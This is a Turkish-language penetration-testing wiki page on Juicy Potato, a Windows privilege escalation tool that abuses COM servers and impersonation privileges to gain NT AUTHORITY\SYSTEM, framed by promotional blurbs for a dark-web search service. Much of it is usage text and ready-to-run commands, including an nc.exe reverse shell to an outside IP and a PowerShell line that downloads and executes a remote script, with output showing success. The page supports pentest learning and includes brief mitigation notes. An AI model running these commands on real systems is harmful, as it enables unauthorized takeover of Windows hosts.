WhiteIntel

WhiteIntel dark-web destekli bir arama motorudur ve şirketin veya müşterilerinin hırsız kötü amaçlı yazılımlar tarafından tehlikeye atılıp atılmadığını kontrol etmek için ücretsiz işlevler sunar.

WhiteIntel'in asıl amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye saldırılarıyla mücadele etmektir.

Websitesini ziyaret edebilir ve motorlarını ücretsiz deneyebilirsiniz:

Juicy Potato (altın ayrıcalıklarını kötüye kullanma)

Biraz meyve suyu eklenmiş RottenPotatoNG'nin tatlandırılmış versiyonu, yani Windows Hizmet Hesaplarından NT AUTHORITY\SYSTEM'e başka bir Yerel Ayrıcalık Yükseltme aracı

Juicypotato'yu buradan indirebilirsiniz

Özet

Juicy-potato Readme'den** alıntı:**

RottenPotatoNG ve varyantları, BITS servisine dayalı ayrıcalık yükseltme zincirini kaldırır, MiTM dinleyicisi 127.0.0.1:6666 üzerinde ve SeImpersonate veya SeAssignPrimaryToken ayrıcalıklarına sahip olduğunuzda. Bir Windows derlemesi incelemesi sırasında, BITS'in kasıtlı olarak devre dışı bırakıldığı ve port 6666'nın alındığı bir yapı bulduk.

RottenPotatoNG'yi silahlandırmaya karar verdik: Juicy Potato'ya hoş geldiniz.

Teori için Rotten Potato - Hizmet Hesaplarından SYSTEM'e Ayrıcalık Yükseltme ve bağlantıların ve referansların zincirini takip edin.

BITS dışında, kötüye kullanabileceğimiz birkaç COM sunucusu olduğunu keşfettik. Sadece:

1. mevcut kullanıcı tarafından anında oluşturulabilir olmalıdır, genellikle bir "hizmet kullanıcısı" olup kimlik hırsızlığı ayrıcalıklarına sahiptir

2. IMarshal arabirimini uygulamalıdır

3. yükseltilmiş bir kullanıcı olarak çalışmalıdır (SYSTEM, Yönetici, …)

Bazı testlerden sonra, çeşitli Windows sürümlerinde ilginç CLSID'lerin kapsamlı bir listesini elde ettik ve test ettik.

Juicy detaylar

JuicyPotato size şunları yapmanızı sağlar:

• Hedef CLSID istediğiniz herhangi bir CLSID'yi seçin. Buradan işletim sistemine göre düzenlenmiş listeyi bulabilirsiniz.

• COM Dinleme portu sabitlenmiş 6666 yerine tercih ettiğiniz COM dinleme portunu tanımlayın

• COM Dinleme IP adresi sunucuyu herhangi bir IP'ye bağlayın

• İşlem oluşturma modu kimlik hırsızlığı yapan kullanıcının ayrıcalıklarına bağlı olarak seçebileceğiniz:

• CreateProcessWithToken (SeImpersonate gerektirir)

• CreateProcessAsUser (SeAssignPrimaryToken gerektirir)

• her ikisi

• Başlatılacak işlem saldırı başarılı olursa bir yürütülebilir dosya veya betik başlatın

• İşlem Argümanı başlatılan işlem argümanlarını özelleştirin

• RPC Sunucu adresi gizli bir yaklaşım için harici bir RPC sunucusuna kimlik doğrulayabilirsiniz

• RPC Sunucu portu eğer bir güvenlik duvarı port 135'i engelliyorsa harici bir sunucuya kimlik doğrulamak istiyorsanız faydalı olabilir…

• TEST modu genellikle test amaçlıdır, yani CLSID'leri test etmek için. DCOM oluşturur ve token kullanıcısını yazdırır. Test etmek için buraya bakın

Kullanım

T:\>JuicyPotato.exe
JuicyPotato v0.1

Mandatory args:
-t createprocess call: <t> CreateProcessWithTokenW, <u> CreateProcessAsUser, <*> try both
-p <program>: program to launch
-l <port>: COM server listen port


Optional args:
-m <ip>: COM server listen address (default 127.0.0.1)
-a <argument>: command line argument to pass to program (default NULL)
-k <ip>: RPC server ip address (default 127.0.0.1)
-n <port>: RPC server listen port (default 135)

Son düşünceler

Juicy Potato Readme'den:

Eğer kullanıcı SeImpersonate veya SeAssignPrimaryToken ayrıcalıklarına sahipse, o zaman SYSTEM olursunuz.

Tüm bu COM Sunucularının kötüye kullanımını engellemek neredeyse imkansızdır. Bu nesnelerin izinlerini DCOMCNFG aracılığıyla değiştirmeyi düşünebilirsiniz ama başarılar, bu zor olacak.

Gerçek çözüm, * SERVICE hesapları altında çalışan hassas hesapları ve uygulamaları korumaktır. DCOM'u durdurmak kesinlikle bu saldırıyı engelleyecektir ancak altta yatan işletim sistemi üzerinde ciddi bir etkisi olabilir.

Kaynak: http://ohpe.it/juicy-potato/

Örnekler

Not: Denemek için CLSID'lerin bir listesi için bu sayfayı ziyaret edin.

Bir nc.exe ters kabuk alın

c:\Users\Public>JuicyPotato -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c c:\users\public\desktop\nc.exe -e cmd.exe 10.10.10.12 443" -t *

Testing {4991d34b-80a1-4291-83b6-3328366b9097} 1337
......
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

c:\Users\Public>

Powershell tersine

.\jp.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://10.10.14.3:8080/ipst.ps1')" -t *

Yeni bir CMD başlatın (RDP erişiminiz varsa)

CLSID Sorunları

Genellikle, JuicyPotato'nun varsayılan CLSID'si çalışmaz ve güvenlik açığı başarısız olur. Genellikle, çalışan bir CLSID bulmak için birden fazla deneme yapmak gerekir. Belirli bir işletim sistemi için denemek için bir CLSID listesi almak için şu sayfayı ziyaret etmelisiniz:

CLSİD'leri Kontrol Etme

İlk olarak, juicypotato.exe dışında bazı yürütülebilir dosyalara ihtiyacınız olacak.

Join-Object.ps1'yi indirin ve PS oturumunuza yükleyin, ardından GetCLSID.ps1'yi indirin ve yürütün. Bu betik, test etmek için olası CLSID'lerin bir listesini oluşturacaktır.

Daha sonra test_clsid.bat'ı indirin(CLSID listesi ve juicypotato yürütülebilir dosyasının yolunu değiştirin) ve yürütün. Her CLSID'yi denemeye başlayacak ve port numarası değiştiğinde, bu CLSID'nin çalıştığı anlamına gelecektir.

Çalışan CLSID'leri parametre -c kullanarak kontrol edin

Referanslar

• https://github.com/ohpe/juicy-potato/blob/master/README.md

WhiteIntel

WhiteIntel, şirketin veya müşterilerinin hırsız kötü amaçlı yazılımlar tarafından kompromize edilip edilmediğini kontrol etmek için ücretsiz işlevsellikler sunan dark-web destekli bir arama motorudur.

WhiteIntel'in asıl amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.

Websitesini ziyaret edebilir ve ücretsiz olarak motorlarını deneyebilirsiniz: